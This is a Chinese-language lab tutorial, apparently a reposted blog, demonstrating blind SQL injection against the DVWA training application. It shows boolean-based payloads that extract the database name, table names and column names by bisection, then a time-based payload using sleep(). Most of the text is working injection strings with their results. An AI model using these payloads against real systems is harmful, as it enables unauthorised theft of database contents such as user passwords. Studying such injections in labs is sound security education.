DVWA之sql注入——盲注

1.盲注

1.1 布尔盲注

布尔很明显的Ture跟Fales,也就说它只会根据你的注入信息返回Ture跟Fales,也就没有了之前的报错 信息。

1.判断是否存在注入,注入的类型

DVWA之sql注入——盲注_第1张图片

DVWA之sql注入——盲注_第2张图片

不管输入框输入为何内容,页面上只会返回以下2种情形的提示: 满足查询条件则返回"User ID exists in the database.",不满足查询条件则返回"User ID is MISSING from the database.";两者返回的内容随所构造的真假条件而不同,说明存在SQL盲注。 

下面来演示一下盲注的过程:

2.猜解当前数据库名称

①猜解库名长度(二分法)

我们先猜测库名的长度大于10

于是构造payload:1' and length(database())>10#

DVWA之sql注入——盲注_第3张图片

但是结果显示missing

所以我们可以知道库名的长度比10要小

再次构造payload:1' and length(database())>5# 

结果还是missing

那这次用1' and length(database())>3#来试试 

DVWA之sql注入——盲注_第4张图片

结果显示exists

所以库名的长度在3-5之间

最后我们构造1' and length(database())=4#

DVWA之sql注入——盲注_第5张图片

显示exists,所以可以确定库名的长度为4

②判断数据库名称的字符组成元素 

既然我们知道数据库名有4个字符,那我们该如何确定具体的字符是什么呢?

我们可以在给定的字符串中利用substr()函数,从指定位置开始截取指定长度的字符串,分离出数据库名称的每 个位置的元素,并分别将其转换为ASCII码,与对应的ASCII码值比较大小,找到比值相同时的字符,然 后各个击破。

substr()函数可以截取字符串,格式为substr(字符串,从第几个字符开始截取,截取的长度)

DVWA之sql注入——盲注_第6张图片

ascii()函数可以将字符转换为十进制数

DVWA之sql注入——盲注_第7张图片

ASCII码对照表 —在线工具 (sojson.com)

所以我们构造payload:1' and ascii(substr((select database()),1,1))>100#,这里我们同样用二分法

DVWA之sql注入——盲注_第8张图片

结果显示是missing

再次构造: 1' and ascii(substr((select database()),1,1))>50#

DVWA之sql注入——盲注_第9张图片

结果显示为exists,可知该ascii值在50到100之间

那我们再对其进行构造: 1' and ascii(substr((select database()),1,1))>75#

DVWA之sql注入——盲注_第10张图片

依然是exists,现在范围已经被我们逐渐缩小

经过不断测试,最终发现1' and ascii(substr((select database()),1,1))=100#是exists

所以第一个字符的ascii值为100,通过查找ascii表可知该字符为d

DVWA之sql注入——盲注_第11张图片

 

 那我们现在可以使用同样的方法对其他三个字符进行注入

最终可以注入出库名为dvwa

③判断表的数量

构造:1' and (select count(table_name) from information_schema.tables where table_schema=database())>5#

DVWA之sql注入——盲注_第12张图片

构造:1' and (select count(table_name) from information_schema.tables where table_schema=database())>2#

DVWA之sql注入——盲注_第13张图片

1' and (select count(table_name) from information_schema.tables where table_schema=database())>2#

DVWA之sql注入——盲注_第14张图片

所以我们可以知道dvwa库中有两张表

④猜解表名的长度

构造:1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>10#

结果为missing

构造:1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5#

DVWA之sql注入——盲注_第15张图片

所以第一张表的长度在5-10之间

1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=9#

DVWA之sql注入——盲注_第16张图片

所以可以知道第一张表长度为9,那第二张表的方法相同,最终猜解出长度为5

⑤判断表名的字符组成元素

我们就以第二张表为例,同样是使用substr()函数和ascii()函数的方法

构造:1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>100#

DVWA之sql注入——盲注_第17张图片

exists

再次构造:1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>120#

DVWA之sql注入——盲注_第18张图片

所以范围在100-120之间

经过不断测试我们知道第一个字符的ascii值117

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=117#

DVWA之sql注入——盲注_第19张图片 

查表可知第一个字符为u

DVWA之sql注入——盲注_第20张图片 

 其他几个字符则不再演示,由我们上一篇文章已经知道该表为users

⑥猜解users表中字段个数

1' and (select count(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa')>10#

DVWA之sql注入——盲注_第21张图片

1' and (select count(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa')>5#

DVWA之sql注入——盲注_第22张图片 

1' and (select count(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa')=8#

DVWA之sql注入——盲注_第23张图片

可以知道users表中有8个字段

⑦猜解可能的字段

如果一个一个猜解其中的字段,那工作量十分巨大,现实的生产环境中可能有几十个字段,所以我们可以猜测其中可能存在的字段

比如:1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='username')=1;#

我们猜测其中有个字段为username,如果存在那就会返回exists

DVWA之sql注入——盲注_第24张图片

那我们再猜测可能有user字段 

 1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='user')=1;#

DVWA之sql注入——盲注_第25张图片

所以存在user字段

同理我们也可以猜测是否有password字段

 1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='password')=1;#

DVWA之sql注入——盲注_第26张图片

现在我们知道有user字段和password字段,那最后就是猜解字段值,和之前的方法相同,先是猜解长度,再逐个猜解字符,这个我们就不再演示了。

1.2 时间盲注

界面返回值只有一种 True,无论输入任何值,返回情况都会按正常的来处理。加入特定的时间函数, 通过查看WEB页面返回的时间差来判断注入的语句是否正确。

猜解当前连接数据库的名称

对于 if(判断条件,sleep(n),1) 函数而言,若判断条件为真,则执行sleep(n)函数,达到在正常响应时间 的基础上再延迟响应时间n秒的效果;若判断条件为假,则返回设置的1,此时不会执行sleep(n)函数。

构造:1' and if(length(database())=4,sleep(5),1);#

其实时间盲注和布尔盲注大体的思路差不多,只不过时间盲注得需要借助if()函数和sleep()函数

 

 

 

 

 

 

 

 

 

 

 

 

 

你可能感兴趣的:(sql,数据库,mysql,网络安全)